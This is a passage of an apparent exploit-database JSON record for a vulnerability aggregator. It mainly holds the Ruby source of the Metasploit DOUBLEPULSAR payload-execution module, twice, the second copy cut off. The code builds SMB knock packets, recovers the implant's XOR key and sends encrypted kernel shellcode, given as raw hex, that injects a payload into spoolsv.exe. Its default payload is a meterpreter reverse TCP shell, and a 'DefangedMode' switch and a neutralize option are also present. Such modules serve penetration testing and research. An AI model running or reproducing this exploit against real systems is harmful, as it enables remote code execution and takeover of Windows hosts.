to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-11] #"}, "lastseen": "2021-09-10T22:13:51", "differentElements": ["sourceData"], "edition": 13}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "3b85260f79f398a9ca773de2bd7f79c3", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-11T22:19:07", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142603", "PACKETSTORM:142602", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", 
"1337DAY-ID-27803", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-27752"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:42031", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96706", "SMNTC-96709", "SMNTC-96703", "SMNTC-96707", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": 
"trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-11T22:19:07", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-09-11T22:19:07", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current 
source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 
'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n 